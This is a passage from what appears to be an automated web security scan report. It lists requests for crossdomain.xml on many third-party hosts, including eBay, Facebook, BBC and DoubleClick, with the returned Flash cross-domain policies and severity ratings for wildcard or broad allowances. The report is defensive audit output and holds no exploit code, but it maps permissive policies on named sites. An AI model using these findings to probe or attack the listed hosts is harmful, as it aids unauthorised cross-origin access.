<allow-access-from domain="*"/>
</cross-domain-policy>

5.51. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:906"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:28 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.52. http://stubhub.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stubhub.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stubhub.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1310753133000"
Accept-Ranges: bytes
Content-Length: 201
Date: Tue, 19 Jul 2011 18:36:24 GMT
Connection: close
Last-Modified: Fri, 15 Jul 2011 18:05:33 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.53. http://t.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:58 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 15 Jun 2011 21:26:36 GMT
ETag: "62fc00b-c9-4a5c6cea6fb00"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=12
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.54. http://wa.stubhub.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wa.stubhub.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.55. http://www.clickmanage.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.clickmanage.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clickmanage.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Mon, 13 Apr 2009 20:38:54 GMT
Accept-Ranges: bytes
ETag: "5cabdfdc77bcc91:758"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.56. http://add.my.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.57. http://api.bing.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bing.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close
Set-Cookie: _FS=ui=en-US&mkt=en-US; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.58. http://api.choicestream.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.choicestream.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.choicestream.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 3e8c982c-edf3-440f-ac84-7c9c506acd07
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: application/xml
Content-Length: 296
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Set-Cookie: JSESSIONID=E24BC6DACCEFBC905E29E6A3B7BC7373; Path=/instr
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="*.choicestream.com" />
...[SNIP]...

5.59. http://b.myspace.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b.myspace.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.myspace.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 18:35:39 GMT
Accept-Ranges: bytes
ETag: "cf2446831f4c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:28:32 GMT
Connection: keep-alive
Content-Length: 365

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.myspace.com"/>
   <allow-http-request-headers-from doma
...[SNIP]...

5.60. http://cdn.stumble-upon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Tue, 19 Jul 2011 14:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

5.61. http://cgi.ebay.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cgi.ebay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cgi.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:36:23 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.62. http://developers.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.160.103
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.63. http://edge.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://edge.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Thu, 14 Jul 2011 20:29:31 GMT
Accept-Ranges: bytes
Date: Tue, 19 Jul 2011 14:26:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.64. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=110
Expires: Tue, 19 Jul 2011 14:27:01 GMT
Date: Tue, 19 Jul 2011 14:25:11 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.65. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 18 Jul 2011 22:46:43 GMT
Expires: Tue, 19 Jul 2011 22:46:43 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49041
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.66. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=118
Expires: Tue, 19 Jul 2011 14:27:08 GMT
Date: Tue, 19 Jul 2011 14:25:10 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

5.67. http://rover.ebay.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:35:48 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.68. http://srx.main.ebayrtm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://srx.main.ebayrtm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: srx.main.ebayrtm.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:36:19 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.69. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.145.196
X-Cnection: close
Date: Tue, 19 Jul 2011 18:37:21 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.70. http://wd.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 14:28:23 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Thu, 14 Jul 2011 20:29:31 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.71. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: _e_FxZX_6=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.63.23.51
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
